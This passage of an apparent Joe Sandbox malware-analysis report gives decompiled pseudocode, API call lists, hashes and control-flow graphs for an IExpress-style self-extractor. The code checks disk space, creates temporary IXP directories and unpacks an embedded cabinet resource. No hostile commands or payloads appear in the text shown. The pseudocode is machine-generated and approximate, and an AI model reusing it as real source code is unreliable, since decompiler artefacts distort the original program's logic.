                              						L29:
                              						memset( &_v788, 0, 0x200);
                              						 *0xa79124 = E00A76285();
                              						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                              						_t110 = 0x4b0;
                              						L30:
                              						__eflags = 0;
                              						E00A744B9(0, _t110, _t118,  &_v788, 0x10, 0);
                              						SetCurrentDirectoryA( &_v276);
                              						L31:
                              						_t66 = 0;
                              						__eflags = 0;
                              						L32:
                              						_pop(_t114);
                              						goto L33;
                              					}
                              					_t69 = _v792 * _v796;
                              					_v812 = _t69;
                              					_t116 = MulDiv(_t69, _v800, 0x400);
                              					__eflags = _t116;
                              					if(_t116 == 0) {
                              						goto L29;
                              					}
                              					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
                              					__eflags = _t73;
                              					if(_t73 != 0) {
                              						SetCurrentDirectoryA( &_v276); // executed
                              						_t101 =  &_v16;
                              						_t111 = 6;
                              						_t119 = _t118 - _t101;
                              						__eflags = _t119;
                              						while(1) {
                              							_t22 = _t111 - 4; // 0x2
                              							__eflags = _t22;
                              							if(_t22 == 0) {
                              								break;
                              							}
                              							_t87 =  *((intOrPtr*)(_t119 + _t101));
                              							__eflags = _t87;
                              							if(_t87 == 0) {
                              								break;
                              							}
                              							 *_t101 = _t87;
                              							_t101 = _t101 + 1;
                              							_t111 = _t111 - 1;
                              							__eflags = _t111;
                              							if(_t111 != 0) {
                              								continue;
                              							}
                              							break;
                              						}
                              						__eflags = _t111;
                              						if(_t111 == 0) {
                              							_t101 = _t101 - 1;
                              							__eflags = _t101;
                              						}
                              						 *_t101 = 0;
                              						_t112 = 0x200;
                              						_t102 = _v812;
                              						_t78 = 0;
                              						_t118 = 8;
                              						while(1) {
                              							__eflags = _t102 - _t112;
                              							if(_t102 == _t112) {
                              								break;
                              							}
                              							_t112 = _t112 + _t112;
                              							_t78 = _t78 + 1;
                              							__eflags = _t78 - _t118;
                              							if(_t78 < _t118) {
                              								continue;
                              							}
                              							break;
                              						}
                              						__eflags = _t78 - _t118;
                              						if(_t78 != _t118) {
                              							__eflags =  *0xa79a34 & 0x00000008;
                              							if(( *0xa79a34 & 0x00000008) == 0) {
                              								L20:
                              								_t103 =  *0xa79a38; // 0x0
                              								_t110 =  *((intOrPtr*)(0xa789e0 + (_t78 & 0x0000ffff) * 4));
                              								L21:
                              								__eflags = (_v804 & 0x00000003) - 3;
                              								if((_v804 & 0x00000003) != 3) {
                              									__eflags = _v804 & 0x00000001;
                              									if((_v804 & 0x00000001) == 0) {
                              										__eflags = _t103 - _t116;
                              									} else {
                              										__eflags = _t110 - _t116;
                              									}
                              								} else {
                              									__eflags = _t103 + _t110 - _t116;
                              								}
                              								if(__eflags <= 0) {
                              									 *0xa79124 = 0;
                              									_t66 = 1;
                              								} else {
                              									_t66 = E00A7268B(_a4, _t110, _t103,  &_v16);
                              								}
                              								goto L32;
                              							}
                              							__eflags = _v816 & 0x00008000;
                              							if((_v816 & 0x00008000) == 0) {
                              								goto L20;
                              							}
                              							_t105 =  *0xa79a38; // 0x0
                              							_t110 =  *((intOrPtr*)(0xa789e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0xa789e0 + (_t78 & 0x0000ffff) * 4));
                              							_t103 = (_t105 >> 2) +  *0xa79a38;
                              							goto L21;
                              						}
                              						_t110 = 0x4c5;
                              						E00A744B9(0, 0x4c5, 0, 0, 0x10, 0);
                              						goto L31;
                              					}
                              					memset( &_v788, 0, 0x200);
                              					 *0xa79124 = E00A76285();
                              					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                              					_t110 = 0x4f9;
                              					goto L30;
                              				} else {
                              					_t110 = 0x4bc;
                              					E00A744B9(0, 0x4bc, 0, 0, 0x10, 0);
                              					 *0xa79124 = E00A76285();
                              					_t66 = 0;
                              					L33:
                              					return E00A76CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                              				}
                              			}



































                              0x00a7597d
                              0x00a75988
                              0x00a7598f
                              0x00a7599a
                              0x00a759a6
                              0x00a759a8
                              0x00a759af
                              0x00a759b9
                              0x00a759dd
                              0x00a759e4
                              0x00a759f1
                              0x00a759fe
                              0x00a75a0b
                              0x00a75a13
                              0x00a75a19
                              0x00a75a1b
                              0x00a75ba1
                              0x00a75baf
                              0x00a75bbd
                              0x00a75bd8
                              0x00a75bde
                              0x00a75be3
                              0x00a75bec
                              0x00a75bf0
                              0x00a75bfc
                              0x00a75c02
                              0x00a75c02
                              0x00a75c02
                              0x00a75c04
                              0x00a75c04
                              0x00000000
                              0x00a75c04
                              0x00a75a27
                              0x00a75a3a
                              0x00a75a46
                              0x00a75a48
                              0x00a75a4a
                              0x00000000
                              0x00000000
                              0x00a75a64
                              0x00a75a6a
                              0x00a75a6c
                              0x00a75abc
                              0x00a75ac2
                              0x00a75ac9
                              0x00a75aca
                              0x00a75aca
                              0x00a75acc
                              0x00a75acc
                              0x00a75acf
                              0x00a75ad1
                              0x00000000
                              0x00000000
                              0x00a75ad3
                              0x00a75ad6
                              0x00a75ad8
                              0x00000000
                              0x00000000
                              0x00a75ada
                              0x00a75adc
                              0x00a75add
                              0x00a75add
                              0x00a75ae0
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00a75ae0
                              0x00a75ae2
                              0x00a75ae4
                              0x00a75ae6
                              0x00a75ae6
                              0x00a75ae6
                              0x00a75ae9
                              0x00a75aeb
                              0x00a75af0
                              0x00a75af6
                              0x00a75af8
                              0x00a75af9
                              0x00a75af9
                              0x00a75afb
                              0x00000000
                              0x00000000
                              0x00a75afd
                              0x00a75aff
                              0x00a75b00
                              0x00a75b03
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00a75b03
                              0x00a75b05
                              0x00a75b08
                              0x00a75b20
                              0x00a75b27
                              0x00a75b52
                              0x00a75b52
                              0x00a75b5b
                              0x00a75b62
                              0x00a75b6b
                              0x00a75b6d
                              0x00a75b76
                              0x00a75b7d
                              0x00a75b83
                              0x00a75b7f
                              0x00a75b7f
                              0x00a75b7f
                              0x00a75b6f
                              0x00a75b72
                              0x00a75b72
                              0x00a75b85
                              0x00a75b98
                              0x00a75b9e
                              0x00a75b87
                              0x00a75b8f
                              0x00a75b8f
                              0x00000000
                              0x00a75b85
                              0x00a75b29
                              0x00a75b33
                              0x00000000
                              0x00000000
                              0x00a75b35
                              0x00a75b48
                              0x00a75b4a
                              0x00000000
                              0x00a75b4a
                              0x00a75b0f
                              0x00a75b16
                              0x00000000
                              0x00a75b16
                              0x00a75a7c
                              0x00a75a8a
                              0x00a75aa5
                              0x00a75aab
                              0x00000000
                              0x00a759bb
                              0x00a759c0
                              0x00a759c7
                              0x00a759d1
                              0x00a759d6
                              0x00a75c05
                              0x00a75c14
                              0x00a75c14

                              APIs
                              • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00A759A8
                              • SetCurrentDirectoryA.KERNELBASE(?), ref: 00A759AF
                              • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00A75A13
                              • MulDiv.KERNEL32(?,?,00000400), ref: 00A75A40
                              • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00A75A64
                              • memset.MSVCRT ref: 00A75A7C
                              • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00A75A98
                              • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00A75AA5
                              • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00A75BFC
                                • Part of subcall function 00A744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A74518
                                • Part of subcall function 00A744B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A74554
                                • Part of subcall function 00A76285: GetLastError.KERNEL32(00A75BBC), ref: 00A76285
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                              • String ID:
                              • API String ID: 4237285672-0
                              • Opcode ID: 49ccc860ccc357930e4958093ca7e24ea895a44a7bf13d44859d091126444797
                              • Instruction ID: 8c4ae2badb5aa4a795dee90e2f24e9a3768ff4a69e84dfc1f09bdc981df6987d
                              • Opcode Fuzzy Hash: 49ccc860ccc357930e4958093ca7e24ea895a44a7bf13d44859d091126444797
                              • Instruction Fuzzy Hash: 187185B1A0060CAFE715DB60CD85BFB77BCEB88340F54C5AAF50D96140E6749E868B64
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 374 a74fe0-a7501a call a7468f FindResourceA LoadResource LockResource 377 a75161-a75163 374->377 378 a75020-a75027 374->378 379 a75057-a7505e call a74efd 378->379 380 a75029-a75051 GetDlgItem ShowWindow GetDlgItem ShowWindow 378->380 383 a75060-a75077 call a744b9 379->383 384 a7507c-a750b4 379->384 380->379 388 a75107-a7510e 383->388 389 a750b6-a750da 384->389 390 a750e8-a75104 call a744b9 384->390 392 a75110-a75117 FreeResource 388->392 393 a7511d-a7511f 388->393 401 a75106 389->401 402 a750dc 389->402 390->401 392->393 394 a75121-a75127 393->394 395 a7513a-a75141 393->395 394->395 398 a75129-a75135 call a744b9 394->398 399 a75143-a7514a 395->399 400 a7515f 395->400 398->395 399->400 404 a7514c-a75159 SendMessageA 399->404 400->377 401->388 405 a750e3-a750e6 402->405 404->400 405->390 405->401
                              C-Code - Quality: 77%
                              			E00A74FE0(void* __edi, void* __eflags) {
                              				void* __ebx;
                              				void* _t8;
                              				struct HWND__* _t9;
                              				int _t10;
                              				void* _t12;
                              				struct HWND__* _t24;
                              				struct HWND__* _t27;
                              				intOrPtr _t29;
                              				void* _t33;
                              				int _t34;
                              				CHAR* _t36;
                              				int _t37;
                              				intOrPtr _t47;
                              
                              				_t33 = __edi;
                              				_t36 = "CABINET";
                              				 *0xa79144 = E00A7468F(_t36, 0, 0);
                              				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                              				 *0xa79140 = _t8;
                              				if(_t8 == 0) {
                              					return _t8;
                              				}
                              				_t9 =  *0xa78584; // 0x0
                              				if(_t9 != 0) {
                              					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                              					ShowWindow(GetDlgItem( *0xa78584, 0x841), 5); // executed
                              				}
                              				_t10 = E00A74EFD(0, 0); // executed
                              				if(_t10 != 0) {
                              					__imp__#20(E00A74CA0, E00A74CC0, E00A74980, E00A74A50, E00A74AD0, E00A74B60, E00A74BC0, 1, 0xa79148, _t33);
                              					_t34 = _t10;
                              					if(_t34 == 0) {
                              						L8:
                              						_t29 =  *0xa79148; // 0x0
                              						_t24 =  *0xa78584; // 0x0
                              						E00A744B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                              						_t37 = 0;
                              						L9:
                              						goto L10;
                              					}
                              					__imp__#22(_t34, "*MEMCAB", 0xa71140, 0, E00A74CD0, 0, 0xa79140); // executed
                              					_t37 = _t10;
                              					if(_t37 == 0) {
                              						goto L9;
                              					}
                              					__imp__#23(_t34); // executed
                              					if(_t10 != 0) {
                              						goto L9;
                              					}
                              					goto L8;
                              				} else {
                              					_t27 =  *0xa78584; // 0x0
                              					E00A744B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                              					_t37 = 0;
                              					L10:
                              					_t12 =  *0xa79140; // 0x0
                              					if(_t12 != 0) {
                              						FreeResource(_t12);
                              						 *0xa79140 = 0;
                              					}
                              					if(_t37 == 0) {
                              						_t47 =  *0xa791d8; // 0x0
                              						if(_t47 == 0) {
                              							E00A744B9(0, 0x4f8, 0, 0, 0x10, 0);
                              						}
                              					}
                              					if(( *0xa78a38 & 0x00000001) == 0 && ( *0xa79a34 & 0x00000001) == 0) {
                              						SendMessageA( *0xa78584, 0xfa1, _t37, 0);
                              					}
                              					return _t37;
                              				}
                              			}
















                              0x00a74fe0
                              0x00a74fe6
                              0x00a74ff9
                              0x00a7500d
                              0x00a75013
                              0x00a7501a
                              0x00a75163
                              0x00a75163
                              0x00a75020
                              0x00a75027
                              0x00a75037
                              0x00a75051
                              0x00a75051
                              0x00a75057
                              0x00a7505e
                              0x00a750a7
                              0x00a750ad
                              0x00a750b4
                              0x00a750e8
                              0x00a750e8
                              0x00a750ee
                              0x00a750ff
                              0x00a75104
                              0x00a75106
                              0x00000000
                              0x00a75106
                              0x00a750cd
                              0x00a750d3
                              0x00a750da
                              0x00000000
                              0x00000000
                              0x00a750dd
                              0x00a750e6
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00a75060
                              0x00a75060
                              0x00a75070
                              0x00a75075
                              0x00a75107
                              0x00a75107
                              0x00a7510e
                              0x00a75111
                              0x00a75117
                              0x00a75117
                              0x00a7511f
                              0x00a75121
                              0x00a75127
                              0x00a75135
                              0x00a75135
                              0x00a75127
                              0x00a75141
                              0x00a75159
                              0x00a75159
                              0x00000000
                              0x00a7515f

                              APIs
                                • Part of subcall function 00A7468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A746A0
                                • Part of subcall function 00A7468F: SizeofResource.KERNEL32(00000000,00000000,?,00A72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A746A9
                                • Part of subcall function 00A7468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A746C3
                                • Part of subcall function 00A7468F: LoadResource.KERNEL32(00000000,00000000,?,00A72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A746CC
                                • Part of subcall function 00A7468F: LockResource.KERNEL32(00000000,?,00A72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A746D3
                                • Part of subcall function 00A7468F: memcpy_s.MSVCRT ref: 00A746E5
                                • Part of subcall function 00A7468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A746EF
                              • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00A74FFE
                              • LoadResource.KERNEL32(00000000,00000000), ref: 00A75006
                              • LockResource.KERNEL32(00000000), ref: 00A7500D
                              • GetDlgItem.USER32(00000000,00000842), ref: 00A75030
                              • ShowWindow.USER32(00000000), ref: 00A75037
                              • GetDlgItem.USER32(00000841,00000005), ref: 00A7504A
                              • ShowWindow.USER32(00000000), ref: 00A75051
                              • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00A75111
                              • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00A75159
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                              • String ID: *MEMCAB$CABINET
                              • API String ID: 1305606123-2642027498
                              • Opcode ID: b22c67206508cff2048c9d61d02309b1d5b587054dd303540e4dc3a9e7020875
                              • Instruction ID: ed2fe6663e6e4c6f74121c2e395f4531dede8aafff7dd5896a6682bd8da9fabb
                              • Opcode Fuzzy Hash: b22c67206508cff2048c9d61d02309b1d5b587054dd303540e4dc3a9e7020875
                              • Instruction Fuzzy Hash: 04310971B80701BFE710ABB1AD8DF6B369CB758755F44C625B90D921A1DBB48C828650
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              C-Code - Quality: 95%
                              			E00A753A1(CHAR* __ecx, CHAR* __edx) {
                              				signed int _v8;
                              				char _v268;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t5;
                              				long _t13;
                              				int _t14;
                              				CHAR* _t20;
                              				int _t29;
                              				int _t30;
                              				CHAR* _t32;
                              				signed int _t33;
                              				void* _t34;
                              
                              				_t5 =  *0xa78004; // 0x74742267
                              				_v8 = _t5 ^ _t33;
                              				_t32 = __edx;
                              				_t20 = __ecx;
                              				_t29 = 0;
                              				while(1) {
                              					E00A7171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                              					_t34 = _t34 + 0x10;
                              					_t29 = _t29 + 1;
                              					E00A71680(_t32, 0x104, _t20);
                              					E00A7658A(_t32, 0x104,  &_v268); // executed
                              					RemoveDirectoryA(_t32); // executed
                              					_t13 = GetFileAttributesA(_t32); // executed
                              					if(_t13 == 0xffffffff) {
                              						break;
                              					}
                              					if(_t29 < 0x190) {
                              						continue;
                              					}
                              					L3:
                              					_t30 = 0;
                              					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                              						_t30 = 1;
                              						DeleteFileA(_t32);
                              						CreateDirectoryA(_t32, 0);
                              					}
                              					L5:
                              					return E00A76CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                              				}
                              				_t14 = CreateDirectoryA(_t32, 0); // executed
                              				if(_t14 == 0) {
                              					goto L3;
                              				}
                              				_t30 = 1;
                              				 *0xa78a20 = 1;
                              				goto L5;
                              			}

















                              0x00a753ac
                              0x00a753b3
                              0x00a753b9
                              0x00a753bb
                              0x00a753bd
                              0x00a753bf
                              0x00a753d1
                              0x00a753d6
                              0x00a753e0
                              0x00a753e2
                              0x00a753f5
                              0x00a753fb
                              0x00a75402
                              0x00a7540b
                              0x00000000
                              0x00000000
                              0x00a75413
                              0x00000000
                              0x00000000
                              0x00a75415
                              0x00a75416
                              0x00a75427
                              0x00a7542a
                              0x00a7542b
                              0x00a75434
                              0x00a75434
                              0x00a7543a
                              0x00a7544c
                              0x00a7544c
                              0x00a75452
                              0x00a7545a
                              0x00000000
                              0x00000000
                              0x00a7545e
                              0x00a7545f
                              0x00000000

                              APIs
                                • Part of subcall function 00A7171E: _vsnprintf.MSVCRT ref: 00A71750
                              • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A753FB
                              • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A75402
                              • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A7541F
                              • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A7542B
                              • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A75434
                              • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A75452
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                              • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$IXP$IXP%03d.TMP
                              • API String ID: 1082909758-957705000
                              • Opcode ID: 6fa79c8c9b9309a660a6dc2c92dcf82274552ec50d629341985815ebef2faf86
                              • Instruction ID: c23f18039d7621c91d9c4fbbb94d84ff7fa197fac703cc3ae18813276883dc75
                              • Opcode Fuzzy Hash: 6fa79c8c9b9309a660a6dc2c92dcf82274552ec50d629341985815ebef2faf86
                              • Instruction Fuzzy Hash: 0C11047270050477E720DB769C49FAF37ADEBD1311F00C525B54ED2190CEB4898386A1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 478 a75467-a75484 479 a7551c-a75528 call a71680 478->479 480 a7548a-a75490 call a753a1 478->480 483 a7552d-a75539 call a758c8 479->483 484 a75495-a75497 480->484 493 a7554d-a75552 483->493 494 a7553b-a75545 CreateDirectoryA 483->494 486 a75581-a75583 484->486 487 a7549d-a754c0 call a71781 484->487 488 a7558d-a7559d call a76ce0 486->488 495 a754c2-a754d8 GetSystemInfo 487->495 496 a7550c-a7551a call a7658a 487->496 500 a75585-a7558b 493->500 501 a75554-a75557 call a7597d 493->501 498 a75577-a7557c call a76285 494->498 499 a75547 494->499 502 a754fe 495->502 503 a754da-a754dd 495->503 496->483 498->486 499->493 500->488 509 a7555c-a7555e 501->509 510 a75503-a75507 call a7658a 502->510 507 a754f7-a754fc 503->507 508 a754df-a754e2 503->508 507->510 513 a754e4-a754e7 508->513 514 a754f0-a754f5 508->514 509->500 515 a75560-a75566 509->515 510->496 513->496 517 a754e9-a754ee 513->517 514->510 515->486 518 a75568-a75575 RemoveDirectoryA 515->518 517->510 518->486
                              C-Code - Quality: 75%
                              			E00A75467(CHAR* __ecx, void* __edx, char* _a4) {
                              				signed int _v8;
                              				char _v268;
                              				struct _SYSTEM_INFO _v304;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t10;
                              				void* _t13;
                              				intOrPtr _t14;
                              				void* _t16;
                              				void* _t20;
                              				signed int _t26;
                              				void* _t28;
                              				void* _t29;
                              				CHAR* _t48;
                              				signed int _t49;
                              				intOrPtr _t61;
                              
                              				_t10 =  *0xa78004; // 0x74742267
                              				_v8 = _t10 ^ _t49;
                              				_push(__ecx);
                              				if(__edx == 0) {
                              					_t48 = 0xa791e4;
                              					_t42 = 0x104;
                              					E00A71680(0xa791e4, 0x104);
                              					L14:
                              					_t13 = E00A758C8(_t48); // executed
                              					if(_t13 != 0) {
                              						L17:
                              						_t42 = _a4;
                              						if(_a4 == 0) {
                              							L23:
                              							 *0xa79124 = 0;
                              							_t14 = 1;
                              							L24:
                              							return E00A76CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                              						}
                              						_t16 = E00A7597D(_t48, _t42, 1, 0); // executed
                              						if(_t16 != 0) {
                              							goto L23;
                              						}
                              						_t61 =  *0xa78a20; // 0x0
                              						if(_t61 != 0) {
                              							 *0xa78a20 = 0;
                              							RemoveDirectoryA(_t48);
                              						}
                              						L22:
                              						_t14 = 0;
                              						goto L24;
                              					}
                              					if(CreateDirectoryA(_t48, 0) == 0) {
                              						 *0xa79124 = E00A76285();
                              						goto L22;
                              					}
                              					 *0xa78a20 = 1;
                              					goto L17;
                              				}
                              				_t42 =  &_v268;
                              				_t20 = E00A753A1(__ecx,  &_v268); // executed
                              				if(_t20 == 0) {
                              					goto L22;
                              				}
                              				_push(__ecx);
                              				_t48 = 0xa791e4;
                              				E00A71781(0xa791e4, 0x104, __ecx,  &_v268);
                              				if(( *0xa79a34 & 0x00000020) == 0) {
                              					L12:
                              					_t42 = 0x104;
                              					E00A7658A(_t48, 0x104, 0xa71140);
                              					goto L14;
                              				}
                              				GetSystemInfo( &_v304);
                              				_t26 = _v304.dwOemId & 0x0000ffff;
                              				if(_t26 == 0) {
                              					_push("i386");
                              					L11:
                              					E00A7658A(_t48, 0x104);
                              					goto L12;
                              				}
                              				_t28 = _t26 - 1;
                              				if(_t28 == 0) {
                              					_push("mips");
                              					goto L11;
                              				}
                              				_t29 = _t28 - 1;
                              				if(_t29 == 0) {
                              					_push("alpha");
                              					goto L11;
                              				}
                              				if(_t29 != 1) {
                              					goto L12;
                              				}
                              				_push("ppc");
                              				goto L11;
                              			}




















                              0x00a75472
                              0x00a75479
                              0x00a75481
                              0x00a75484
                              0x00a7551c
                              0x00a75521
                              0x00a75528
                              0x00a7552d
                              0x00a7552f
                              0x00a75539
                              0x00a7554d
                              0x00a7554d
                              0x00a75552
                              0x00a75585
                              0x00a75585
                              0x00a7558b
                              0x00a7558d
                              0x00a7559d
                              0x00a7559d
                              0x00a75557
                              0x00a7555e
                              0x00000000
                              0x00000000
                              0x00a75560
                              0x00a75566
                              0x00a75569
                              0x00a7556f
                              0x00a7556f
                              0x00a75581
                              0x00a75581
                              0x00000000
                              0x00a75581
                              0x00a75545
                              0x00a7557c
                              0x00000000
                              0x00a7557c
                              0x00a75547
                              0x00000000
                              0x00a75547
                              0x00a7548a
                              0x00a75490
                              0x00a75497
                              0x00000000
                              0x00000000
                              0x00a7549d
                              0x00a754ab
                              0x00a754b4
                              0x00a754c0
                              0x00a7550c
                              0x00a75511
                              0x00a75515
                              0x00000000
                              0x00a75515
                              0x00a754c9
                              0x00a754d6
                              0x00a754d8
                              0x00a754fe
                              0x00a75503
                              0x00a75507
                              0x00000000
                              0x00a75507
                              0x00a754da
                              0x00a754dd
                              0x00a754f7
                              0x00000000
                              0x00a754f7
                              0x00a754df
                              0x00a754e2
                              0x00a754f0
                              0x00000000
                              0x00a754f0
                              0x00a754e7
                              0x00000000
                              0x00000000
                              0x00a754e9
                              0x00000000

                              APIs
                              • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A754C9
                              • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A7553D
                              • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A7556F
                                • Part of subcall function 00A753A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A753FB
                                • Part of subcall function 00A753A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A75402
                                • Part of subcall function 00A753A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A7541F
                                • Part of subcall function 00A753A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A7542B
                                • Part of subcall function 00A753A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A75434
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                              • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$alpha$i386$mips$ppc
                              • API String ID: 1979080616-772166365
                              • Opcode ID: 8061de8261691305a3a6b45fb00322636acb702a59addc6aa2919960f043a3d3
                              • Instruction ID: 9327e94a92df74a997feae0ba354588660f384d45fdeb5c76f455361afee5b16
                              • Opcode Fuzzy Hash: 8061de8261691305a3a6b45fb00322636acb702a59addc6aa2919960f043a3d3
                              • Instruction Fuzzy Hash: BC31F771F00A056BCB549B799D4597F77EBAB81340F08C13AA40EC6590DBF4CE428695
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
